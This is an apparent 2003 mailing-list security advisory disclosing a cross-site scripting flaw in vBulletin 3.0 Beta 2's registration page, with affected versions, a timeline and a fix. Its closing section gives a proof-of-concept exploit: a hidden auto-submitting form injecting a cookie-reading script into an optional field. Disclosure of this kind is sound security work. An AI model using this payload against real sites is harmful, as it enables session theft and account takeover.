Vulnwatch mailing list archives

VBulletin New Member XSS Vulnerability

From: "Ferruh Mavituna" <ferruh () mavituna com>
Date: Fri, 8 Aug 2003 17:53:53 +0300
------------------------------------------------------
VBulletin New Member XSS Vulnerability
------------------------------------------------------
Any kind of XSS attacks possibility. With this vuln. an attacker could
access other users/admins accounts.
Online URL : http://ferruh.mavituna.com/article.asp?256

------------------------------------------------------
About VBulletin;
------------------------------------------------------
PHP Based Popular Forum Application

Vendor & Demo;
www.vbulletin.com

------------------------------------------------------
Description;
------------------------------------------------------
In new member page (register.php), If you skip a required field system
redirect you same form and fill fields automaticly that you enter before for
a better form. In standard fields Vbulletin successfully handle script
injections. But in optional fields like "Interests-Hobbies", "Biography",
"Occupation" etc...

So you can execute any JS with this fields.

------------------------------------------------------
Vulnerable;
------------------------------------------------------
vBulletin 3.0 Beta 2

------------------------------------------------------
Non Vulnerable;
------------------------------------------------------
vBulletin 2.3.0
vBulletin 2.2.8 ...


------------------------------------------------------
Vendor Status;
------------------------------------------------------
No answer at the moment.

------------------------------------------------------
History
------------------------------------------------------
Discovered : 15.07.2003
Vendor Informed : 29.07.2003
Publihed : 06.08.2003

------------------------------------------------------
Solution;
------------------------------------------------------
HTML Encoding like other inputs is OK.

------------------------------------------------------
Exploit Code;
------------------------------------------------------
[form action="http://[victim]/register.php?do=register"; method="post"
style="display:none"]
 [input type="hidden" name="s" value="" /]
 [input type="hidden" name="regtype" value="1" /]
 [input type="text" class="bginput" name="field1" value="" size="25"
maxlength="250" /]
 [input type="hidden" name="url" value="index.php" /]
 [input type="hidden" name="do" value="addmember" /]
[/form]
[script]
 //Code that will be executed
 var xss = "\"][script]alert(document"+".cookie)[\/script]";
 document.forms[0].field1.value=xss;
 document.forms[0].submit();
[/script]

*Replace ([],<>)

Ferruh Mavituna
ferruh () mavituna com
http://ferruh.mavituna.com
Web Application Security Specialist
Current thread:

VBulletin New Member XSS Vulnerability Ferruh Mavituna (Aug 08)